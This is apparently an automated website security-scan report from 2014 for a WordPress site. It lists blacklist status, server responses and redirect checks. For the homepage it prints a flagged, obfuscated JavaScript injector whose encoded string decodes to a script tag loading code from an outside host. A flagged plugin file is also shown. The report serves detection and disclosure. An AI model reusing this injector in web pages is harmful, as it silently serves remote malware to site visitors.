Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gct-tunisia.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gct-tunisia.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 26 May 2014 09:04:14 GMT Location: http://gct-tunisia.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://gct-tunisia.com/xmlrpc.php | clean |
http://gct-tunisia.com/ | 200 OK Content-Length: 70375 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1') Antivirus reports:
| ||
http://gct-tunisia.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/themes-ai1ec/vortex/js/event.min.js | 200 OK Content-Length: 970 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/gpp-slideshow/js/jquery.flexslider-min.js | 200 OK Content-Length: 11376 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/gpp-slideshow/js/jquery.fader.js | 200 OK Content-Length: 1071 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 1606 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.cookie.js | 200 OK Content-Length: 4246 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.dcjqaccordion.2.9.js | 200 OK Content-Length: 6770 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/read-more-right-here/js/wt_rmrh.js | 200 OK Content-Length: 4457 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/anything-popup/anything-popup.js | 200 OK Content-Length: 6737 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/catablog/js/catablog.lightbox.js | 200 OK Content-Length: 16095 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/photo-gallery/js/bwg_frontend.js | 200 OK Content-Length: 3082 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js | 200 OK Content-Length: 25171 Content-Type: application/javascript | clean |
http://gct-tunisia.com/wp-content/plugins/photo-gallery/js/jquery.fullscreen-0.4.1.js | 200 OK Content-Length: 7583 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { function defined(a) { return typeof a !== 'undefined'; } function extend(child, parent, prototype) { var F = function() {}; F.prototype = parent.prototype; child.prototype = new F(); child.prototype.constructor = child; parent.prototype.constructor = parent; child._super = parent.prototype; if (prototype) { $.extend(child.prototype, prototype); } } var SUBST = [ ['', ''], element: function() { return this.__isFullScreen ? this._fullScreenElement : null; } });$.fullscreen = IS_NATIVELY_SUPPORTED ? new FullScreenNative() : new FullScreenFallback(); $.fn.fullscreen = function(options) { var elem = this[0]; options = $.extend({ toggleClass: null, }, options); options.styles = { }; if (elem) { $.fullscreen.open(elem, options); } return this; }; })(jQuery); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gct-tunisia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 26 May 2014 09:04:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://gct-tunisia.com/?p=20>; rel=shortlink
X-Pingback: http://gct-tunisia.com/xmlrpc.php
GET / HTTP/1.1
Host: gct-tunisia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 26 May 2014 09:04:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://gct-tunisia.com/?p=20>; rel=shortlink
X-Pingback: http://gct-tunisia.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: gct-tunisia.com
Referer: http://www.google.com/search?q=gct-tunisia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gct-tunisia.com
Referer: http://www.google.com/search?q=gct-tunisia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.